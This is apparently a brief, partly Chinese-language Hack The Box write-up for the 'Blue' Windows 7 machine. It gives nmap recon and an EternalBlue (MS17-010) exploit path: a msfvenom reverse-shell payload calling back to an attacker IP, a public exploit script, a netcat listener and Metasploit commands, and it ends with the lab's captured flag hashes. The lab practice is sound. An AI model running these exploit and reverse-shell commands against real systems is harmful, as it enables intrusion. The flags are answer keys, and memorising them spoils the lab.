Blue (Hack The Box Writeup)

• URL : https://app.hackthebox.eu/machines/51
• IP : 10.129.209.90

Recon

• Rustscannmap- nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 10.129.209.90系統版本- Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)smb-
• 
• nmapAutomator-

Exploit

• https://github.com/helviojunior/MS17-010修改 send_and_execute.py 裡面的 username等於 guestMSF 準備 shell- msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe -o shellx64.exe其實這邊用 x86 也可以執行 Exploit- python send_and_execute.py 10.129.216.62 ../shellx64.exe
• nc 收 shell-

MSF Exploit

• use windows/smb/ms17_010_eternalblue
• options
• set RHOSTS 10.129.216.62
• set LHOST 10.10.16.35
• runGet Root Key- ff548eb71e920ff6c08843ce9df4e717
• Get User Key-
• 4c546aea7dbee75cbd71de245c8deea9